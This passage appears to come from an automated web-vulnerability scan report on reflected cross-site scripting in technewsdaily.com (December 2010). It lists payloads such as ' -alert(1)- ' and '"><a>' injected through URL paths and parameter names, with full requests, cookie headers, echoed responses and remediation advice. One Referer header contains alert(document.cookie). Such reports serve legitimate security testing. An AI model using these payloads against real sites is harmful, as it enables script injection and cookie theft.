<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" > <head> <script type="text/javascript"> <!-- var ...[SNIP]... <script type="text/javascript"> setTimeout('COMSCORE.beacon({'+ 'c1:2,'+ 'c2:"6035753",'+ 'c3:"6035753",'+ 'c4:"http://www.technewsdaily.com/media/system/js/1ffe8'-alert(1)-'3bed600e059",'+ 'c5:"Technology - News",'+ 'c6:"",'+ 'c15:""'+ '});',0); </script> ...[SNIP]...
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b8047'-alert(1)-'235767e372e was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /media/system/js/b8047'-alert(1)-'235767e372e HTTP/1.1 Host: www.technewsdaily.com Proxy-Connection: keep-alive Referer: http://www.technewsdaily.com/how-to-secure-privacy-on-facebook-0596f1fd9'-alert(document.cookie)-'eed141cc16/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7
Response
HTTP/1.1 200 OK Date: Sat, 18 Dec 2010 02:50:47 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: Zend Core/2.5.5 PHP/5.2.11 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" X-Content-Encoded-By: Joomla! 1.5 Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Sat, 18 Dec 2010 02:50:48 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 40432
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" > <head> <script type="text/javascript"> <!-- var ...[SNIP]... <script type="text/javascript"> setTimeout('COMSCORE.beacon({'+ 'c1:2,'+ 'c2:"6035753",'+ 'c3:"6035753",'+ 'c4:"http://www.technewsdaily.com/media/system/js/b8047'-alert(1)-'235767e372e",'+ 'c5:"Technology - News",'+ 'c6:"",'+ 'c15:""'+ '});',0); </script> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7a3d1'-alert(1)-'1f5bcb4c5a1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /must-follow-rules-for-safe-online-shopping-18277a3d1'-alert(1)-'1f5bcb4c5a1/ HTTP/1.1 Host: www.technewsdaily.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;
Response
HTTP/1.1 200 OK Date: Sat, 18 Dec 2010 02:54:20 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: Zend Core/2.5.5 PHP/5.2.11 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Sat, 18 Dec 2010 02:54:20 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 40492
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" > <head> <script type="text/javascript"> <!-- var ...[SNIP]... type="text/javascript"> setTimeout('COMSCORE.beacon({'+ 'c1:2,'+ 'c2:"6035753",'+ 'c3:"6035753",'+ 'c4:"http://www.technewsdaily.com/must-follow-rules-for-safe-online-shopping-18277a3d1'-alert(1)-'1f5bcb4c5a1/",'+ 'c5:"Technology - News",'+ 'c6:"",'+ 'c15:""'+ '});',0); </script> ...[SNIP]...
1.120. http://www.technewsdaily.com/must-follow-rules-for-safe-online-shopping-1827/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://www.technewsdaily.com
Path:
/must-follow-rules-for-safe-online-shopping-1827/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b8097"><a>2dce5072f32 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /must-follow-rules-for-safe-online-shopping-1827/?b8097"><a>2dce5072f32=1 HTTP/1.1 Host: www.technewsdaily.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;
Response
HTTP/1.1 200 OK Date: Sat, 18 Dec 2010 02:53:58 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: Zend Core/2.5.5 PHP/5.2.11 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Sat, 18 Dec 2010 02:53:58 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 64640
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml"> <head> <script type="text/javascript"> <!- ...[SNIP]... <link rel="canonical" src="http://www.technewsdaily.com/must-follow-rules-for-safe-online-shopping-1827/?b8097"><a>2dce5072f32=1/" /> ...[SNIP]...
1.121. http://www.technewsdaily.com/must-follow-rules-for-safe-online-shopping-1827/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.technewsdaily.com
Path:
/must-follow-rules-for-safe-online-shopping-1827/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6f241'-alert(1)-'e604f936331 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /must-follow-rules-for-safe-online-shopping-1827/?6f241'-alert(1)-'e604f936331=1 HTTP/1.1 Host: www.technewsdaily.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;
Response
HTTP/1.1 200 OK Date: Sat, 18 Dec 2010 02:54:11 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: Zend Core/2.5.5 PHP/5.2.11 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Sat, 18 Dec 2010 02:54:11 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 64278
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml"> <head> <script type="text/javascript"> <!- ...[SNIP]... ype="text/javascript"> setTimeout('COMSCORE.beacon({'+ 'c1:2,'+ 'c2:"6035753",'+ 'c3:"6035753",'+ 'c4:"http://www.technewsdaily.com/must-follow-rules-for-safe-online-shopping-1827/?6f241'-alert(1)-'e604f936331=1",'+ 'c5:"Technology - News",'+ 'c6:"",'+ 'c15:""'+ '});',0); </script> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 54536'-alert(1)-'4bc56577a9e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /neuron-like-computer-hardware-finally-gets-software-174654536'-alert(1)-'4bc56577a9e/ HTTP/1.1 Host: www.technewsdaily.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;
Response
HTTP/1.1 200 OK Date: Sat, 18 Dec 2010 02:55:13 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: Zend Core/2.5.5 PHP/5.2.11 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Sat, 18 Dec 2010 02:55:13 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 40510
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" > <head> <script type="text/javascript"> <!-- var ...[SNIP]... xt/javascript"> setTimeout('COMSCORE.beacon({'+ 'c1:2,'+ 'c2:"6035753",'+ 'c3:"6035753",'+ 'c4:"http://www.technewsdaily.com/neuron-like-computer-hardware-finally-gets-software-174654536'-alert(1)-'4bc56577a9e/",'+ 'c5:"Technology - News",'+ 'c6:"",'+ 'c15:""'+ '});',0); </script> ...[SNIP]...
1.123. http://www.technewsdaily.com/neuron-like-computer-hardware-finally-gets-software-1746/ [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7abfc'-alert(1)-'56ad7ec5a69 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /neuron-like-computer-hardware-finally-gets-software-1746/?7abfc'-alert(1)-'56ad7ec5a69=1 HTTP/1.1 Host: www.technewsdaily.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;
Response
HTTP/1.1 200 OK Date: Sat, 18 Dec 2010 02:55:01 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: Zend Core/2.5.5 PHP/5.2.11 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Sat, 18 Dec 2010 02:55:01 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 63392
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml"> <head> <script type="text/javascript"> <!- ...[SNIP]... /javascript"> setTimeout('COMSCORE.beacon({'+ 'c1:2,'+ 'c2:"6035753",'+ 'c3:"6035753",'+ 'c4:"http://www.technewsdaily.com/neuron-like-computer-hardware-finally-gets-software-1746/?7abfc'-alert(1)-'56ad7ec5a69=1",'+ 'c5:"Technology - News",'+ 'c6:"",'+ 'c15:""'+ '});',0); </script> ...[SNIP]...
1.124. http://www.technewsdaily.com/neuron-like-computer-hardware-finally-gets-software-1746/ [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 41e97"><a>e63c5a1a0e1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /neuron-like-computer-hardware-finally-gets-software-1746/?41e97"><a>e63c5a1a0e1=1 HTTP/1.1 Host: www.technewsdaily.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;
Response
HTTP/1.1 200 OK Date: Sat, 18 Dec 2010 02:54:49 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: Zend Core/2.5.5 PHP/5.2.11 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Sat, 18 Dec 2010 02:54:49 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 63754
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml"> <head> <script type="text/javascript"> <!- ...[SNIP]... <link rel="canonical" src="http://www.technewsdaily.com/neuron-like-computer-hardware-finally-gets-software-1746/?41e97"><a>e63c5a1a0e1=1/" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload db497'-alert(1)-'7f3300b2a24 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /new-cell-network-doesnt-depend-on-towers--0882db497'-alert(1)-'7f3300b2a24/ HTTP/1.1 Host: www.technewsdaily.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 18 Dec 2010 01:21:54 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: Zend Core/2.5.5 PHP/5.2.11 Set-Cookie: a5e04250348ef9239c1cdf4824f43ad1=doa41jcrmvnrm1ov06t4apnvc5; path=/ P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Sat, 18 Dec 2010 01:21:54 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 40490
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" > <head> <script type="text/javascript"> <!-- var ...[SNIP]... t type="text/javascript"> setTimeout('COMSCORE.beacon({'+ 'c1:2,'+ 'c2:"6035753",'+ 'c3:"6035753",'+ 'c4:"http://www.technewsdaily.com/new-cell-network-doesnt-depend-on-towers--0882db497'-alert(1)-'7f3300b2a24/",'+ 'c5:"Technology - News",'+ 'c6:"",'+ 'c15:""'+ '});',0); </script> ...[SNIP]...
1.126. http://www.technewsdaily.com/new-cell-network-doesnt-depend-on-towers--0882/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.technewsdaily.com
Path:
/new-cell-network-doesnt-depend-on-towers--0882/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f7de0'-alert(1)-'484fbe1e4c0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /new-cell-network-doesnt-depend-on-towers--0882/?f7de0'-alert(1)-'484fbe1e4c0=1 HTTP/1.1 Host: www.technewsdaily.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 18 Dec 2010 01:21:49 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: Zend Core/2.5.5 PHP/5.2.11 Set-Cookie: a5e04250348ef9239c1cdf4824f43ad1=kq0tas2bar2akbcou8l1gujn23; path=/ P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Sat, 18 Dec 2010 01:21:49 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 64698
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml"> <head> <script type="text/javascript"> <!- ...[SNIP]... type="text/javascript"> setTimeout('COMSCORE.beacon({'+ 'c1:2,'+ 'c2:"6035753",'+ 'c3:"6035753",'+ 'c4:"http://www.technewsdaily.com/new-cell-network-doesnt-depend-on-towers--0882/?f7de0'-alert(1)-'484fbe1e4c0=1",'+ 'c5:"Technology - News",'+ 'c6:"",'+ 'c15:""'+ '});',0); </script> ...[SNIP]...
1.127. http://www.technewsdaily.com/new-cell-network-doesnt-depend-on-towers--0882/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://www.technewsdaily.com
Path:
/new-cell-network-doesnt-depend-on-towers--0882/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 67e85"><a>e4f38b36690 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /new-cell-network-doesnt-depend-on-towers--0882/?67e85"><a>e4f38b36690=1 HTTP/1.1 Host: www.technewsdaily.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 18 Dec 2010 01:21:35 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: Zend Core/2.5.5 PHP/5.2.11 Set-Cookie: a5e04250348ef9239c1cdf4824f43ad1=2g2ap04jqcaj9krnjid7ip9on4; path=/ P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Sat, 18 Dec 2010 01:21:36 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 65060
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml"> <head> <script type="text/javascript"> <!- ...[SNIP]... <link rel="canonical" src="http://www.technewsdaily.com/new-cell-network-doesnt-depend-on-towers--0882/?67e85"><a>e4f38b36690=1/" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7f3b7'-alert(1)-'214cc2106d6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /newsletter-subscription7f3b7'-alert(1)-'214cc2106d6/ HTTP/1.1 Host: www.technewsdaily.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;
Response
HTTP/1.1 200 OK Date: Sat, 18 Dec 2010 02:58:28 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: Zend Core/2.5.5 PHP/5.2.11 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Sat, 18 Dec 2010 02:58:29 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 40444
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" > <head> <script type="text/javascript"> <!-- var ...[SNIP]... <script type="text/javascript"> setTimeout('COMSCORE.beacon({'+ 'c1:2,'+ 'c2:"6035753",'+ 'c3:"6035753",'+ 'c4:"http://www.technewsdaily.com/newsletter-subscription7f3b7'-alert(1)-'214cc2106d6/",'+ 'c5:"Technology - News",'+ 'c6:"",'+ 'c15:""'+ '});',0); </script> ...[SNIP]...
1.129. http://www.technewsdaily.com/newsletter-subscription/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.technewsdaily.com
Path:
/newsletter-subscription/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 88c14'-alert(1)-'162c30e436 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /newsletter-subscription/?88c14'-alert(1)-'162c30e436=1 HTTP/1.1 Host: www.technewsdaily.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;
Response
HTTP/1.1 200 OK Date: Sat, 18 Dec 2010 02:58:20 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: Zend Core/2.5.5 PHP/5.2.11 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Sat, 18 Dec 2010 02:58:20 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 29178
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" > <head> <script type="text/javascript"> <!-- var ...[SNIP]... <script type="text/javascript"> setTimeout('COMSCORE.beacon({'+ 'c1:2,'+ 'c2:"6035753",'+ 'c3:"6035753",'+ 'c4:"http://www.technewsdaily.com/newsletter-subscription/?88c14'-alert(1)-'162c30e436=1",'+ 'c5:"Technology - News",'+ 'c6:"",'+ 'c15:""'+ '});',0); </script> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ba524'-alert(1)-'43ee8bcdc30 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /next-google-phone-samsung-nexus-s-is-official-1754ba524'-alert(1)-'43ee8bcdc30/ HTTP/1.1 Host: www.technewsdaily.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;
Response
HTTP/1.1 200 OK Date: Sat, 18 Dec 2010 02:56:45 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: Zend Core/2.5.5 PHP/5.2.11 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Sat, 18 Dec 2010 02:56:45 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 40498
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" > <head> <script type="text/javascript"> <!-- var ...[SNIP]... pe="text/javascript"> setTimeout('COMSCORE.beacon({'+ 'c1:2,'+ 'c2:"6035753",'+ 'c3:"6035753",'+ 'c4:"http://www.technewsdaily.com/next-google-phone-samsung-nexus-s-is-official-1754ba524'-alert(1)-'43ee8bcdc30/",'+ 'c5:"Technology - News",'+ 'c6:"",'+ 'c15:""'+ '});',0); </script> ...[SNIP]...
1.131. http://www.technewsdaily.com/next-google-phone-samsung-nexus-s-is-official-1754/ [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ea4ef'-alert(1)-'51f06504e6c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
